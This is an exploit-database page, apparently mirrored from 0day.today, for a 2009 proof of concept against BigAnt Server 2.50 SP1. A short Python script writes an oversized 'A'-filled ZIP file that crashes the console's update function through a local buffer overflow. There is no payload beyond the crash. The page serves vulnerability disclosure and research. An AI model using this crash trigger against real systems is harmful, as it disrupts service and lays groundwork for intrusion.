Lucene search
K

BigAnt Server 2.50 SP1 (ZIP File) Local Buffer Overflow PoC

🗓️ 16 Sep 2009 00:00:00Reported by Dr_IDEType 
zdt
 zdt
🔗 0day.today👁 20 Views

BigAnt Server 2.50 SP1 Local Buffer Overflow PoC Python scrip

Code
===========================================================
BigAnt Server 2.50 SP1 (ZIP File) Local Buffer Overflow PoC
===========================================================


#!/usr/bin/env python

#######################################################################
#
# BigAnt Server 2.50 SP1 Local Buffer Overflow PoC
# Found By: 	Dr_IDE
# Tested:   	XPSP3
# Usage:	Open BigAnt Console, Go to Update, Browse to zip, Boom.
#
#######################################################################

buff = ("\x41" * 10000)

f1 = open("BigAntUpdate.zip","w")
f1.write(buff)
f1.close()



#  0day.today [2018-01-01]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation